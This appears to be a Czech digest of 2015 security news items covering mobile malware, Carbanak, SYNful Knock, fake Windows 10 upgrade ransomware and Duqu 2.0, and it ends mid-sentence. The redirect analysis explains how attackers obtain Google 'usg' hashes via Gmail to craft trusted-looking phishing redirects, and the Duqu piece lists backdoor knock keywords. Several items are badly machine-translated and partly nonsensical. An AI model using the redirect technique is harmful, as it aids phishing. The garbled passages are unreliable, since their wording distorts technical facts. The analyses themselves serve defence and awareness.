Virus maskovali za didaktickou hru. Nakazit se mohlo až půl miliónu přístrojů
29.9.2015 Mobil
Až 500 000 zařízení bylo infikováno nebezpečným virem poté, co jejich uživatelé stáhli na první pohled nenápadnou didaktickou hru BrainTest. Že byl ke hře připojen i škodlivý kód odhalili minulý týden bezpečnostní experti ze společnosti Check Point. Nakazit tak velké množství chytrých telefonů a počítačových tabletů se kyberzločincům podařilo jen díky tomu, že dokázali propašovat aplikaci společně s virem na oficiální obchod Google Play. Obelstít se jim tak podařilo bezpečnostní systém, který zkoumá, zda nejsou programy škodlivé.
„Podle statistik Google Play byl pokaždé počet stažení mezi 100 000 a 500 000. Velké množství stažení znamená, že malware byl na Google Play delší dobu a svědčí to o pokročilých útočných metodách, které jsou schopné zamaskovat škodlivý kód i před nejrůznějšími bezpečnostními technikami používanými společností Google k odhalení hrozeb,“ uvedl mediální zástupce Check Pointu Petr Cícha.
Odstranit ze zařízení škodlivý kód, který se nainstaloval společně s hrou BrainTest, není vůbec jednoduché. Malware totiž dokáže zvyšovat na napadených přístrojích svá oprávnění. To mu umožňuje zůstat v přístroji i poté, co se uživatel pokusí o jeho odinstalaci.
„Za poslední měsíc odhalil Check Point na Google Play dvě nebezpečné aplikace, což dokazuje, že ani stažení aplikace z oficiálního a důvěryhodného obchodu neznamená, že aplikace je bezpečná,“ doplnil Cícha.
Eset kupuje šifrovací firmu, odhalil i nebezpečný malware
24.9.2015 Viry Eset kupuje britskou společnost DESlock+, producenta šifrovacích nástrojů. Její řešení už přitom v současné době nabízí v rámci své Technology Alliance.
Společnost DESlock+ vyvinula šifrovací řešení, založené na technologii pro správu šifrovacích klíčů.
Řešení DESlock+ má širokou škálu šifrovacích funkcí, jež zahrnují zabezpečenou správu celého řešení pomocí browseru, mobilní verzi pro iOS, mobilní operační systém společnosti Apple, nebo přenosného klienta DESlock+ GO, který umožňuje bezpečný přístup k datům na pracovních stanicích i bez nainstalovaného produktu DESlock+.
„Náš plán je plně integrovat šifrování do našich produktů pro firmy i domácnosti. A samozřejmě budeme šifrovací technologii DESlock+ dál vyvíjet,“ tvrdí Palo Luka, ředitel pro technologie Esetu.
DESlock+ se má postupně začlenit do struktur Esetu, nebude tedy dále už působit samostatně.
Eset také detekoval nové stopy aktivity obávané skupiny Carbanak. Ta se v letech 2013 a 2014 proslavila cílenými útoky na systémy zhruba stovky bank.
S pomocí malware dokázali zločinci bankovní systémy ovládat do takové míry, že mohli zadávat příkazy k převodu peněz nebo libovolně měnit nastavení bankomatů – například, aby každému, kdo zadá určené heslo, vydávaly vysoké částky.
Arzenál použitého malware se sice změnil, ale části kódů nebo použitý digitální certifikát jasně svědčí o souvislosti s původním škodlivým kódem Carbanak, který Eset detekuje jako Win32/Spy.Sekur.
Za pozornost stojí, že nové útoky skupiny Carbanak tentokrát nemíří jenom na banky, ale také na další instituce z finančního sektoru, například firmy, zabývající se obchodováním s měnami. Mezi zjištěnými cíli byl také hotel a kasino v americkém Las Vegas.
Carbanak, který z bank vysál miliardu dolarů, znovu začíná řádit
23.9.2015 Viry
Letos v únoru byla odhalena „velká kybernetická loupež“, za kterou stála skupina Carbanak, respektive stejnojmenný malware. Ten se šířil po bankách celého světa a umožňoval útočníkům přístup k bankovním systémům. Po menších částkách pak postupně převedli na svoje účty odhadem až miliardu dolarů. Skupina Carbanak je nyní zjevně opět aktivní a už se nezaměřuje jen na banky.
Tady všude „vysával“ Carbanak
Původní velké odhalení má na svědomí tým Kaspersky, nyní však nové odhalení přináší konkurenční ESET. „Arzenál použitého malware se sice změnil, ale části kódů nebo použitý digitální certifikát jasně svědčí o souvislosti s původním škodlivým kódem Carbanak,“ vysvětluje souvislost zástupce Esetu.
Nové formy malwaru cíleného na zaměstnance finančních institucí už si nově nehledá cesty jen do bank, ale také do dalších společností, kde probíhají online transakce s měnami. „Mezi zjištěnými cíli byl také hotel a kasino v Las Vegas,“ upozorňuje ESET.
Problém s malwarem v routerech Cisco je mnohem závažnější
23.9.2015 Viry Útočníci nainstalovali škodlivý firmware na nejméně dvě stovky směrovačů firmy Cisco, užívaných firmami ve více než třiceti zemích.
Tvrdí to analýza skupiny Shadowserver Foundation, zabývající se bojem proti kyberkriminalitě a sledující nekalé aktivity na internetu. Na útoky upozornila minulé úterý Mandiant, dceřiná společnost firmy FireEye, s tím, že útočníci nahradili firmware na routerech ISR společnosti Cisco Systems.
Tato modifikace jim poté umožňuje trvalý přístup takzvanými zadními vrátky do systému a dává možnost instalovat do něj malwarové moduly.
Ještě minulý týden mělo být takto napadených routerů čtrnáct, ve čtyřech zemích – v Mexiku, na Ukrajině, v Indii a na Filipínách, přičemž se jednalo o modely Cisco 1841, 2811 a 3825, jež se ale dnes už neprodávají.
Cisco proto ve spolupráci s dobrovolníky ze Shadowserver provedlo scan, který měl odhalit další potenciálně napadená zařízení. A podezření se potvrdila.
Routerů napadených skrze zadní vrátka malwarovou modifikací nazvanou SYNful Knock bylo daleko víc než čtrnáct. Scan nalezl dalších 199 unikátních IP adres v 31 zemích, které vykazovaly známky napadení. Nejvíc – 65 – jich je z USA, 12 z Indie a 11 z Ruska.
„Je důležité upozornit na závažnost tohoto problému. Odhalení a opravení napadených routerů by mělo být top prioritou,“ uvádí Shadowserver ve své zprávě s tím, že dotčené provozovatele bude o výsledcích svých zjištění brzy postupně informovat.
Ovládnutím routerů totiž útočníci získají přístup a možnost upravování síťového provozu a mohou tak uživatele přesměrovávat na požadované webové stránky anebo páchat další škody na zařízeních v rámci lokální sítě, která by byla z internetu jinak nepřístupná.
A jelikož zařízení, na která autoři SYNful Knock útočí, jsou zpravidla profesionální routery užívané firmami nebo poskytovateli internetového připojení, dopad útoku může pocítit značné množství uživatelů.
Rush pro Windows 10 infikuje počítače s Spy Trojan 12.8.2015 Viry
Vzhledem k vysoké poptávce pro Windows 10, Microsoft vydává ji postupně. To se týká zejména některých zemích. Oficiální web Microsoft Brazílie jej (levý obrázek) potvrzuje. Počítačoví zločinci z Brazílie využili této a běží spam kampaň shodnou s oficiálním designu nabízí falešnou volbu pro uživatele, aby "dostat svou kopii teď". (Pravý obrázek)
Když oběť klikne na "Instalador Windows 10" (Windows Installer) 10, stáhne do systému zakódován VBE skriptu:
To je base64 skript, pomocí zákonný Motobit software pro kódování:
Jakmile běží, to klesne hlavní Trojan-špionážní komponentu do systému. Oni také používají vtipné brazilská portugalština slang přímo v kódu.
Upustil hlavní bankou modul obsahuje funkce pro krást data z stisky kláves a schránky. Navíc, to má backdoor funkce pro vzdálené relace a několik anti-VM, techniky ladění.
Kaspersky Anti-Virus zjistí původní scénář VBE jako Trojan-Downloader.VBS.Agent.aok
V poslední době jsme zaznamenali velký nárůst VBS / VBE malware v Brazílii, můj kolega Fabio Assolini pracuje na BLOGPOST asi VBE malware široce rozšířen v Brazílii nyní.
Virů pro mobily je třikrát více než v zimě. Cílí především na mobilní bankovnictví
6.8.2015 Viry Počet nových škodlivých programů pro mobilní zařízení se v druhém čtvrtletí proti předcházejícím třem měsícům ztrojnásobil na téměř 300 000. Odborníci zároveň odhalili jeden milión instalačních balíčků k mobilním hrozbám, což je sedminásobek proti prvnímu čtvrtletí. Uvedla to antivirová firma Kaspersky Lab. Hlavním terčem hrozeb zůstalo mobilní bankovnictví. Ve druhém čtvrtletí se například objevila nová verze trojského koně Trojan-SMS.AndroidOS.OpFake.cc, která byla schopná napadnout 114 bankovních a finančních aplikací, což je čtyřnásobné množství proti předchůdci ze začátku roku. Hlavním cílem tohoto trojanu bylo ukrást přihlašovací údaje uživatele a napadnout jimi, kromě jiného, mnoho populárních e-mailových aplikací.
Objevilo se 5,9 miliónu upozornění na pokusy škodlivých programů ukrást peníze skrz online přístup k bankovním účtům. To je o 800 000 méně než v prvním čtvrtletí. Nejvíce uživatelů podlehlo bankovním trojským koním v Singapuru (5,3 procenta). Následují Švýcarsko, Brazílie, Austrálie a Hong Kong. Většina zemí v první desítce je technologicky vyspělá nebo má rozvinutý bankovní systém, což přitahuje pozornost kyberzločinců.
Bankovní viry útočící na klienty online bankovních systémů tvořily 83 procent všech finančních hrozeb. Kromě nich finanční hrozby představovali také takzvaní bitcoinoví horníci, tedy programy, které používají výpočetní zdroje počítačů obětí k tvorbě bitcoinů, a dále zloději bitcoinových peněženek.
V průměru 24 procent uživatelů internetu po celém světě podlehlo alespoň jednou webovému útoku. To je o 2,4 procentního bodu méně než v prvním čtvrtletí. Počet unikátních škodlivých objektů klesl o osm procent na 26 miliónů. Nejrozšířenější byl skript AdWare.JS.Agent.bg, aplikovaný reklamními programy do libovolných webových stránek.
Pozor na falešný upgrade Windows 10, obsahuje vyděračský software
6.8.2015 Viry Pozor na falešný upgrade Windows 10, obsahuje vyděračský softwareVčera, Milan Šurkala, aktualitaUvedení nového operačního systému Windows 10 se chytly také nekalé živly. Pokud vám přijde mail s nabídkou bezplatného upgradu na Windows 10, buďte obezřetní. Může se totiž jednat o vyděračský software, který bude požadovat výkupné. Distribuce nového operačního systému Windows 10 se chytli nebezpeční útočníci, kteří posílají e-maily obsahující nabídku bezplatného upgradu. Tento mail ale nenainstaluje Windows 10, nýbrž aktivuje vyděračský software (ransomware) CTB-Locker, který zašifruje data na disku a vyžaduje výkupné za jejich odemčení.
Oběti mají na zaplacení výkupného v Bitcoinech pouhých 96 hodin (a žádnou jistotu, že jejich data budou po zaplacení skutečně odemčena). E-mail navíc vypadá poměrně věrohodně. Používá vzhledu e-mailů od Microsoftu, jeho hlavička je "Windows 10 Free Update" a uvedená e-mailová adresa je "update@microsoft.com". Ve skutečnosti je ale e-mail poslán odněkud z Thajska. Aby vypadal ještě věrohodněji, dole zobrazuje hlášku, že byl zkontrolován antivirovým softwarem a je bezpečný. Pokud vám tedy tento e-mail přišel, rozhodně nespouštějte přílohu v něm umístěnou!
První malware Thunderstrike 2, který útočí na firmwary Apple Mac
5.8.2015 Viry První malware Thunderstrike 2, který útočí na firmwary Apple MacVčera, Milan Šurkala, aktualitaPočítače Apple Mac jsou obecně považovány za bezpečnější než klasická PC. Přesto byl vědci vytvořen nový druh malwaru, který dokáže tyto počítače napadnout, a to dokonce jejich firmware. Ani přeinstalování operačního systému tak nepomůže. Protože klasických PC je mnohem více než Maců, není divu, že jsou také častěji napadány a obecně jsou brány jako méně bezpečná platforma. Přesto se ukázalo, že ani Macy nejsou úplně bezpečné a v podstatě většina zranitelností, na které trpí PC, sužuje i tyto počítače. O výzkum v této oblasti se zasadili vědci Xeno Kovah (bezpečnostní konzultant a majitel společnosti LegbaCore) a Tramell Hudson (bezpečnostní inženýr).
Ti totiž vytvořili malware Thunderstrike 2, který je schopen infikovat samotný firmware těchto zařízení (EFI). Tato část počítače (obdoba BIOSu u PC) totiž není kontrolována antivirovými programy a navíc i po reinstalaci operačního systému tak škodlivý software zůstává v počítači. Řešením je buď takový počítač vyhodit nebo přeflashovat samotný firmware počítače, což nemusí být zrovna snadná záležitost. Problém je způsoben tím, že výrobci obvykle tuto část počítače příliš nechrání a nebývá dostatečně zabezpečena proti přepsání nesprávným firmwarem, který nepochází od výrobce.
Zajímavostí je i to, že už v minulém roce byl proveden výzkum na téma bezpečnosti BIOSů a nyní se ukázalo, že z šesti bezpečnostních děr, které trápí klasická PC, jich pět ohrožuje i Apple Mac. Jedna oprava už spatřila světlo světa, druhá byla opravena částečně. Tři je ještě pořád nutno vyřešit. I tyto bezpečnostní díry byly použity ke tvorbě malwaru Thunderstrike 2. Ten je zákeřný nejen v tom, že se schová do firmwaru, ale také tím, že se velmi snadno může šířit dál např. pomocí úpravy firmwarů USB disků, externích disků nebo třeba některých síťových prvků (např. přes Apple Thunderbolt Ethernet adapter).
Tvůrci virů nabízejí Windows 10, místo toho si pořídíte ransomware
4.8.2015 Viry
Očekávatelné se stalo skutečností, maily nabízející upgrade na Windows 10 jsou používány šiřiteli ransomare. Pro ty, co čekají až se jejich „rezervace Windows 10“ promění v nabídku aktualizace ve Windows Update, to může být docela lákavé – v mailu dostanou něco, co vypadá jako e-mail od Microsoftu informující o tom, že se dočkali. Pokud ovšem budou pokračovat podle pokynů v mailu, dostane se do jejich počítače zpravidla ransomware. Tedy virus, který nevydá obsah počítače, dokud nezaplatí výkupné.
E-maily navíc „vypadají“ dost podobně, jako aktuálně používaný vizuální styl Microsoftu. Jak ale uvádí Cisco v Your Files Are Encrypted with a “Windows 10 Upgrade” pozornější příjemce by si mohl všimnout chyb v textu. Pro případné uklidnění příjemců nechybí ani obligátní informace o tom, že e-mail byl zkontrolován antivirovým programem – což je něco, co stále některé antivirové programy dělají, ačkoliv už prakticky celé desetiletí víme, že to byl jeden z nejzásadnějších omylů a tvůrci virů šířených e-mailem toto rádi využívají.
Výsledkem e-mailu je stažení ZIPu, v němž se skrývá klasické EXE – nic nového, ale přesto jde o poměrně úspěšnou taktiku. Výsledkem spuštění je zobrazení opravdu kreativní barevné zprávy o tom, že soubory jsou šifrovány přes CTB-LOCKER doprovázené časovým limitem 96 hodin, po které všechny soubory budou zašifrovány nenávratně.
Na CTB-Lockeru v tomto případě je zajímavá řada věcí – používání RSA asymetrického šifrování, využití C2 (Command and Control, ovládací sítě) založeného na hacknutých webech s WordPressem a poměrně značný objem síťové komunikace. Samotná komunikace s řídícími servery probíhá přes port 21, tedy port vyhrazený pro FTP a velmi pravděpodobně tedy průchozí přes případný firewall.
Eset: Na Google Play jsou stále nové podvodné aplikace
25.7.2015 Viry Analytici společnosti Eset objevili dalších 51 podvodných aplikací, každou s nejméně 100 tisíci stažení, které se skrytě připojují k pornostránkám. Na Google Play, oficiálním obchodu s aplikacemi pro platformu Android, se stále objevují nové podvodné aplikace. Skupinou aplikací, které jejich tvůrci dokáží opakovaně v nových variantách dostávat přes zpřísněnou kontrolu na Google Play, jsou takzvané klikající trojany. Jde o malware, který bez vědomí majitele smartphonu nebo tabletu generuje provoz na určených internetových stránkách.
Analytici Eset tento malware na Google Play dlouhodobě sledují. V květnu 2015 odhalili „klikající trojan“ v podvodné aplikaci imitující populární hru Dubsmash. Google v reakci na upozornění Eset aplikaci okamžitě vyřadil z Google Play a uživatele před ní varuje. Podvodníci (podle analýzy kódu jde o stále stejné vývojáře) však dokázali za poslední tři měsíce dostat na Google Play tuto podvodnou aplikaci v různých variantách nejméně 24x.
Analytici Eset objevili „klikající trojany“ také v podvodných verzích dalších populárních aplikací jako Clash of Clans, Subway Surfers nebo Minecraft, a také v různých video downloaderech nebo download managerech. Celkem jde o 51 aplikací, které měly – navzdory často negativním recenzím uživatelů – statisíce stažení.
Odhalené „klikající trojany“ fungují tak, že se připojují k předem definovaným pornostránkám a generují tak na nich fiktivní provoz. Při každém startu však zkontrolují, jestli na přístroji neběží některá z antivirových aplikací. Pokud najdou některý z 16 předem zadaných antivirů, vůbec žádnou aktivitu nevyvíjejí.
V opačném případě si vyžádají z řídícího serveru seznam linků na pornostránky a každých 60 sekund si náhodně vyberou jednu, k níž se připojí. Zobrazí ji však v neviditelném okně, takže uživatel nic netuší – nanejvýš by mohl zaregistrovat zpomalení odezvy přístroje nebo pomalejší internetové připojení.
Nový špionážní malware pod lupou
14.7.2015 Viry Analytici analyzovali malware Dino, používaný k přesně cíleným špionážním útokům. Jak tedy vlastně funguje?
Dino je špionážní malware, blízce příbuzný s dříve odhalenými softwarovými špionážními nástroji Casper, Bunny nebo Babar. Podrobněji se na něj podívali experti z firmy Eset.
Sdílené části kódu ukazují, že za jejich vývojem stojí špionážní skupina, podle všeho francouzsky mluvící, známá v bezpečnostní komunitě jako Animal Farm.
Dino je malware typu backdoor – tedy malware, který umožňuje útočníkovi nepozorovaný přístup do systému. „Komplexní backdoor, jakým je například analyzovaný Dino, umožňuje plné převzetí kontroly nad počítačem,“ komentuje Joan Calvet, analytik Esetu, který se podílel na rozkrytí fungování nového malware.
Dino má modulární strukturu a obsahuje řadu inovací, jimiž se odlišuje od svých příbuzných. Velice zajímavý je třeba modul vytvářející specializovaný souborový systém uložený v paměti, který umožňuje úspěšně tajit vykonávané operace. Dino disponuje také modulem plánovače úloh inspirovaným zjevně aplikací Cron známou z unixových systémů.
Zlepšení doznal také vyhledávací modul. Hromadné prohledávání souborů v infikovaných počítačích je pro hackery prakticky stejně komfortní jako pro legitimního uživatele vyhledávání v jeho vlastním počítači. Hledat je možné podle typu souboru, částí názvů, velikosti nebo data poslední změny.
„Hledání konkrétních souborů a jejich odesílání na řídící servery je pro tento malware evidentně tím klíčovým úkolem,“ uvádí Calvet.
Dino nepatří k mezi malware, určený k masovému rozšíření - naopak, najít jeho vzorky je obtížné. Jde totiž o specializovaný malware, určený k dlouhodobému působení v systémech, které byly předtím detailně zmapovány s využitím „lehčího“ malware.
Většina dosud známých cílů útoků s využitím malwaru Dino je v Íránu; jsou to instituce, které mají blízko k jadernému průmyslu a souvisejícímu výzkumu.
Jak Malware Kampaně Zaměstnávat Google přesměrování a Analytics
1.7.2015 Viry E-mailová zpráva odeslána do pracovníkem banky tvrdily, že odesílatel obdržel bankovním převodem od organizace příjemce a že odesílatel chtěl potvrdit, že platba prošel bez problémů. Oběť byla vyzývají, aby klikněte na odkaz, že mnoho lidí by se uvažovat o bezpečí, z části proto, že začal s "https://www.google.com/". Jak byste zkoumat povahu tohoto e-mailu?
Zkoumání MSG a EML soubory na Linuxu Jeden způsob, jak analyzovat podezřelé zprávu uložit jako Outlook soubor MSG, je začít s MSGConvert nástrojem podle Matijs van Zuijlen. Tento nástroj lze převést MSG soubory do více otevřeného vícedílné MIME formátovaný EML soubory, jehož struktura je definována RFC 822 . MSGConvert funguje na Linuxu. Pokud používáte nedávno aktualizovaný REMnux systém, MSGConvert je již nainstalován a můžete jej vyvolat pomocí příkazu "msgconvert". Pokud používáte jiný distro, můžete nainstalovat nástroj pomocí příkazu "CPAN -i EMAILEM :: Outlook :: Message".
Jakmile MSGConvert vytváří EML soubor, můžete zkoumat některé jeho aspekty pomocí textového editoru, i když tento přístup nebude poskytovat vás s viditelností do některými aspekty obsahu souboru. Lepší alternativou je použití emldump.py utilitu Didier Stevens, který může zpochybnit EML souboru do dílčích komponent a extrahovat obsah, jako je tato: Ve výše uvedeném příkladu, s odvoláním emldump.py bez parametrů ukázal strukturu .eml souboru. Parametr "-d" v režii nástroje vypsat položku, která byla určená pomocí parametru "-s".
Podezřelé e-mailové zprávy zahrnuty prostý text a RTF formátovaný komponenty s odpovídající obsah. To je typické pro mnoho zpráv odeslaných dnes: e-mailový klient odesílatele používá RTF reprezentovat formátování a také připojí textovou verzi zprávy pro e-mailového klienta, který nemůže zobrazit obsah RTF.
V případě e-mailové zprávy popsané zde, není jasné, zda to bylo používáno jako součást masové měřítku nebo cíleného útoku, což je jeden z důvodů, proč jsem to zobrazí jeho obsah sem. Nicméně, zpráva připomínala styl poznámky zveřejněné na jednom veřejném fóru , který vypadal takto:
. "Nedávno jsem dostal BPAY přenosu od vás musím ověřit, je-li správně odesláno Tento kontakt byl ve info příjemce transakce Zde je úplné podrobnosti o platbě:.."
Automatické přesměrování pomocí Google Škodlivý odkaz vložený do e-mailové zprávy byla navržena, aby oběť věří, že cíl URL byl umístěn na google.com, a byla tudíž, trezor. Ve skutečnosti, odkaz byl navržen tak, aby přesměrovat do ZIP souboru umístěn na Dropbox. Adresa URL byla pečlivě strukturován tak, aby využívat automatické přesměrování schopnost google.com. Začalo to takhle:
Nicméně, jednoduchá forma této adresy URL by byla nedostatečná pro spuštění automatického přesměrování. Místo toho, Google by představil oběť s následující zprávou:
Tak, že oběť se nesetkalo toto oznámení, útočník přidal "USG =" parametr ke škodlivému URL. Ačkoli podrobnosti tohoto parametru na Google vyhledávací URL jsou dokumentovány, zdá se, že obsahuje hash nebo kontrolní součet URL zadané v "Q =" parametr. Je-li "USG =" chybí nebo je jeho obsah neodpovídá URL v dotazu, pak Google není automaticky přesměrovat a představuje oznámení výše. Správné hodnoty dodány v rámci tohoto parametru způsobí google.com se automaticky přesměruje na zadanou adresu URL. Google používá tento mechanismus, jak nasměrovat návštěvníky na jejich požadované místo určení, když klepnete na odkaz na stránce s výsledky vyhledávání.
Nikdo mimo Google Zdá se, že znát algoritmus pro výpočet "USG =" obsah. Chcete-li odvodit správnou hodnotu, musí útočník musel čekat na Google na obsah indexu jeho nebo její Dropbox, takže servery Google precomputed hash / kontrolní součet. Nicméně, protivníci mohou dostat Google rychle vypočítat "USG" hash. Například, zlosyn můžete e-mailem na požadovanou cílovou adresu URL pro jeho / její vlastní účet Gmail, a potom přístup ke službě Gmail pomocí základní zobrazení HTML . Z nějakého důvodu, při přístupu tímto způsobem, Gmail konvertuje URL vložené do e-mailu na Google-přesměrované formulář, který zahrnuje řádné "USG" hash.
Vyzbrojeni správné "USG" hash, útočník by měl vědět, jak k řemeslu URL, které automaticky přesměrováni na victim.The potenciál využití "USG =" pro automatické škodlivých přesměrování je znám již několik let , ačkoli v té době to bylo Není jasné, jak útočníci mohli rychle získat "USG" hodnoty hash.
Google si je vědoma potenciálu pro využití svého vyhledávače k přesměrování a nepovažuje to zranitelnost . Pozice Googlu je, že URL "nejsou spolehlivým ukazatelem bezpečnosti, a může být manipulováno s mnoha způsoby, takže jsme se investovat do technologií pro detekci a upozorňuje uživatele o phishing a zneužívání, ale obecně si myslí, že malý počet správně sledovaných přesměrovačů Nabízí poměrně jasné výhody a představuje velmi malý praktický riziko. "
Jak je diskutováno v tomto deníku událost ukazuje, protivníci zaměstnávat google.com pro přesměrování nicméně, zřejmě s určitým úspěchem. Navíc, schopnost Gmail poskytovat útočníkům s jednoduchým způsobem pro výpočet "USG" hashe oslabuje záruky, které Google postavil na obranu proti zneužívání jeho funkce přesměrování. (Hlášeny jsem Gmail-související scénář společnosti Google, takže společnost může posoudit potenciál pro jeho zneužití.)
Jak tohoto psaní, je to již není možné stáhnout škodlivý zip soubor popsanou v e-mailu výše, protože Dropbox prezentuje následující zpráva:
Chyba (429) Tento účet je veřejné odkazy generují příliš velký provoz a byly dočasně zakázáno!
Sledování e-mailu pomocí služby Google Analytics Škodlivý Zpráva obsahovala vložený 1-pixel obraz, který byl navržen tak, aby sledovat, zda, kdy a kde příjemce otevřel zprávu. Tento web chyba byla spojena s Google Analytics účtu útočníka. K dosažení tohoto cíle, vložený HTML kód začal takto:
img src = "http:? //www.google-analytics.com/collect v = 1 & tid = ...
"Tid =" parametr obsahoval odesílatele Google Analytics nesleduje ID. "Cid =" parametr identifikovat příjemce zprávy pomocí e-mailovou adresu osoby. Jako výsledek, věnované Analytics předpokladu, obrácenou poznatků nezbytné sledovat účinnost a kontext počátečním útoku vektoru.
V tomto incidentu, útočník byl pomocí hlavního proudu nástrojů dodat nebezpečný náklad a dávat pozor na celkovém kampani s pomocí přesměrování vyhledávač Google je, Google Analytics a Dropbox. Tyto nástroje poskytují protivníky s výkonnými a škálovatelné schopnosti na přijatelnou cenu nula dolarů.
Vyděračský malware? Častější, než si myslíte
30.6.2015 Viry Pro 84 procent firem by mohlo být zničující, pokud by se jejich infrastruktury dostal vyděračský malware. A třetina by prý nakonec musela výpalné i zaplatit.
Víc než třetina firem má podle průzkumu, který udělala v rámci evropské konference Infosecurity firma Eset, vlastní zkušenosti se zašifrovanými daty a následným požadavkem na výpalné, nebo jejich manažeři bezprostředně znají firmu, která takové zkušenosti má.
“Ukazuje se, že vyděračský malware je v praxi až překvapivě rozšířený,” komentuje Mark James, bezpečnostní specialista společnosti Esetu.
Respondenti považují vyděračský malware za reálné nebezpečí. 84 procent jich souhlasilo s tezí, že jejich firma by případným úspěšným útokem ransomware utrpěla „vážné škody“. 31 procent respondentů se dokonce přihlásilo ke konstatování, že „zaplatit výpalné by byla jediná možnost, jak nepřijít o zašifrovaná data“.
„Ransomware je jedním z nejnebezpečnějších typů malware, protože má opravdu velký destruktivní potenciál. Průzkum ukázal, že experti na IT bezpečnost často nejsou na tento typ hrozby připraveni.Podíl těch, kdo by byli ochotni platit výpalné, je přitom znepokojivě vysoký. Znamená totiž, že je vysoký podíl firem, které nevěří, že jejich data jsou dobře zálohovaná a dostupná pro obnovu,“ dodává James.
Obranou proti vyděračskému šifrovacímu malware je jednak prevence samotného útoku, tedy obezřetnost uživatelů a používání kvalitního bezpečnostního řešení, a také prevence následků případné úspěšné infiltrace systémů. Ta spočívá v implementaci řešení pro zálohování a obnovu.
„Důležité je, aby firma průběžně testovala svou schopnost data skutečně obnovit. To je totiž důležité i z mnoha dalších důvodů, než jen kvůli odolnosti vůči vyděračům,“ uvádí James.
Duqu 2.0 Přetrvávání modul 20.6.2015
Již dříve jsme popsáno , jak Duqu 2,0 nemá normální "persistence" mechanismus. To může vést uživatele k závěru, že proplachování ven malware, je stejně jednoduché jako restartování všech infikovaných počítačů. Ve skutečnosti, věci jsou trochu složitější.
Útočníci vytvořil neobvyklou perzistence modul, který se nasadit na kompromitovaných sítích. Slouží dvojí funkci - je to také podporuje skryté C & C komunikační schéma. Tato organizace úroveň persistence je dosaženo pomocí ovladač, který je nainstalován jako normální systémová služba. Na 64-bitových systémech, to znamená přísný požadavek na digitální podpis Authenticode. Viděli jsme dva takové řidiči persistence nasazených v průběhu útoků.
Během jejich operací herci Duqu hrozeb nainstalovat tyto škodlivé ovladačů na firewally, bran nebo jiných serverů, které mají přímý přístup k internetu na jedné straně a firemní přístup k síti na druhé straně. Tím, jejich použití, mohou dosáhnout několika cílů najednou: přístup k vnitřní infrastrukturu z internetu, vyhnout se záznamy protokolu ve firemních proxy serverů a udržovat formu přetrvávání po všem.
V podstatě, řidiči jsou přesměrování síťové toky do a ze brány stroje, který jej provozuje. Chcete-li předat spojení, útočník musí nejprve projít založené na síti "klepání" mechanismus pomocí tajného klíčového slova. Viděli jsme dvě různé tajné klíčová slova ve vzorcích jsme dosud shromážděných: " romanian.antihacker "a" ugly.gorilla " .
Popsali jsme jeden z těchto ovladačů v naší whitepaper o Duqu 2.0 (viz " The "portserv.sys" řidiče analýzy oddíl "). Pojďme zopakovat některé z nejvíce důležitých detailů. Řidič poslouchá k síti a očekává, že speciální tajné klíčové slovo (" romanian.antihacker "V tom případě). Za to, že ukládá IP hostitele, který prošel správný tajný klíčové slovo a začne přesměrovat všechny pakety z portu 443-445 (SMB) nebo 3389 (Remote Desktop) tohoto serveru. Toto účinně umožňuje útočníkům na tunelu SMB (tj vzdálený soubor přístup do systému) a Remote Desktop prostřednictvím serveru brány a přitom to vypadalo jako HTTPS (port 443).
Kromě řidiče "romanian.antihacker", objevili jsme, ještě jeden, které se podobný práci, nicméně, podporuje více připojení v obecnějším způsobem:
Pokud řidič uznává tajné klíčové slovo " ugly.gorilla1 ", pak bude veškerý provoz od útočníka IP přesměrováni z portu 443 (HTTPS) na 445 (SMB) Pokud řidič uznává tajné klíčové slovo " ugly.gorilla2 " poté veškerý provoz od útočníka IP bude přesměrován z portu 443 (HTTPS) na 3389 (PRV) Pokud řidič uznává tajné klíčové slovo " ugly.gorilla3 ", pak bude veškerý provoz od útočníka IP přesměrováni z portu 443 (HTTPS) na 135 (RPC) Pokud řidič uznává tajné klíčové slovo " ugly.gorilla4 "poté veškerý provoz od útočníka IP bude přesměrován z portu 443 (HTTPS) na 139 (NetBIOS) Pokud řidič uznává tajné klíčové slovo " ugly.gorilla5 ", pak bude veškerý provoz od útočníka IP přesměrováni z přístavu 1723 (PPTP) a 445 (SMB) Pokud řidič uznává tajné klíčové slovo " ugly.gorilla6 ", pak bude veškerý provoz od útočníka IP přesměrováni z portu 443 (HTTPS) na 47012 (v současné době znám). Rádi bychom si uvědomit, že jeden přístav tady vypadá docela podezřelé: 47012. Zatím jsme neviděli žádné další součásti Duqu 2,0 pomocí tohoto portu, ani jsme našli jinou společnou malware, backdoor nebo legitimní software pomocí tento port (také podle SANS). Nicméně se domnívá, že toto číslo portu se napevno do malware to může být dobrým ukazatelem kompromisu pro Duqu 2.0.
duqu2_1
Část malware s řadou tajných klíčových slov
Tento 64-bit ovladač obsahuje interní název DLL, "termport.sys", zatímco název souboru v souborovém systému byla "portserv.sys". To s největší pravděpodobností znamená, že útočníci změní názvy souborů pro různé operace a detekci tohoto útoku by se neměla spoléhat výhradně na názvy souborů. Kompilace Časové razítko je zřejmě falešný zde: " 23 července 2004 18:14:28 ". Všechny objevené soubory ovladače se nachází v "C: \ Windows \ System32 \ drivers \".
Snad nejdůležitější součástí tohoto útoku strategie je digitální podpis používá pro 64bitové ovladače. Protože se jedná o povinný požadavek na 64-bitových systémech Windows, řidič měl platný digitální podpis. To bylo podepsáno " Hon Hai Precision Industry CO. LTD. " (také známý jako " Foxconn Technology Group ", jeden z největších výrobců elektroniky na světě).
duqu2_2
Digitální podpis řidiče útočníka
Podle informací od řidiče byla podepsána v 20:31 dne 19.02.2015. Níže jsou uvedeny některé další podrobnosti poskytované SysInternal je sigcheck nástroje:
Ověřeno: Podepsáno datum podepsání: 20:31 19.02.2015 Nakladatel:.. Hon Hai Precision Industry CO LTD Popis: Port optimalizaci pro Terminal Server produkt: Microsoft Windows Operační systém Prod verze: 6.1.7601 verze souboru: 6.1.7601 postavený: WINDDK stroje: 64-bit MD5: 92E724291056A5E30ECA038EE637A23F SHA1: 478C076749BEF74EAF9BED4AF917AEE228620B23 PESHA1: F8457AFBD6967FFAE71A72AA44BC3C3A134103D8 PE256: 2891059613156734067A1EF52C01731A1BCFB9C50E817F3CA813C19114BFA556 SHA256: BC4AE56434B45818F57724F4CD19354A13E5964FD097D1933A30E2E31C9BDFA5 Podle Wikipedie "Foxconn Technology Group" je největším světovým výrobcem elektroniky smlouvy a sídlí v Tucheng, New Taipei, Tchaj-wan.
Hlavní zákazníci společnosti Foxconn patří nebo byly zahrnuty některé z největších světových podniků:
